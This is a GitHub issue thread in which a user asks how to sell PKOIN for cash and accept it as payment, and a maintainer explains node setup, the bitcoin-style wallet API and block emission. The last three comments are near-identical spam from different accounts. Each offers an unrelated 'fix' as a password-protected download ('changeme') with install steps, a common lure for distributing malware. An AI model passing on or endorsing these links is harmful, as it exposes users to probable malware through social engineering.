### ISSUE TITLE
Accept payment in PKOIN & buy PKOIN API

### ISSUE THREAD

**Issue by lifeboy** [pocketnetteam/pocketnet.core#441]
I'm not sure where to ask this so if this is the wrong forum, please point me in the right direction.

We would like to create a voucher interface to allow people to aquire PKOIN wilth cash instead of a credit card.  Is there are an api that we could use to achieve this?  Of course the actual payment will have to be done in some way to whomever the funds for PKOIN should go to.  

Of course on the flipside, if we want to be able to receive PKOIN in payment as well.

Is there the document where this is set out?  How do we go about this?

**Comment by andyoknen** [comment]
@lifeboy  An interesting question - I don't understand only the principle of buying for cash. Do you mean something like an exchange office?

**Comment by lifeboy** [comment]
Yes, there are many people in the world that do not have credit card, but they will use a good crypto currency if it were accessible, so we would like to create an exchange mechanism for that.  See [this example](https://1foryou.com).

**Comment by andyoknen** [comment]
In your example, payment via credit card is indicated.

I think there are two ways - you can start your node on the network, get coins in your node and use them as an exchange source. This method is used by exchanges for example or IndaCoin.

The second way is to use a JavaScript module that allows you to communicate with the network without your own node. It is made in the form of a plugin and provides an API for working with a wallet and nodes. He has a list of starting nodes in the network and finds others himself, determines the best and stable nodes in the network. In fact, this plugin is the client side, but it can also be used in the server side.

Choose the option that will be more acceptable to you, and we will be able to discuss further steps and documentation.

**Comment by lifeboy** [comment]
I like the idea of running our own node.  That of course depends on the
volume of traffic, storage, memory and processor resources required to do
this, but if would be my first choice and our contribution to make the
network stronger.

You say "get coins in your node and use them as an exchange source".  How
would one "get coins" then?  Are coins mined of how does on get them?

**Comment by andyoknen** [comment]
If we take IndaCoin as an example, they configure the interface to receive fiat funds and then use the API node to transfer coins to the specified address of the buyer. The API of the node is identical to the API of bitcoin in relation to the wallet.

**Comment by lifeboy** [comment]
Ok, the picture is becoming clearer to me.

How are the coins generated?  Who generates them?

**Comment by andyoknen** [comment]
Hmm, maybe I didn't quite understand the essence of the question. New coins in the blockchain appear due to the so-called emission process. Each block in the network appears 5 coins. Over time, this figure decreases and eventually comes down to zero.

**Comment by lifeboy** [comment]
So who creates the blocks?  Are they created as new posts and content is being posted?

**Comment by andyoknen** [comment]
Blocks create nodes - every minute all nodes in the network try to create a block that includes all transactions accumulated since the last block. One or more nodes eventually create a block, the network accepts the "best" of them, all nodes in the network must accept or reject the new block. The process repeats.

**Comment by andyoknen** [comment]
@lifeboy Is the issue still relevant?

**Comment by lifeboy** [comment]
I think we can close it for now, we are not yet at the stage were we need
to implement.

**Comment by andyoknen** [comment]
In general, we can continue the dialogue here if you have any questions. Or you can create a new Issue for any other issue that we can discuss.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
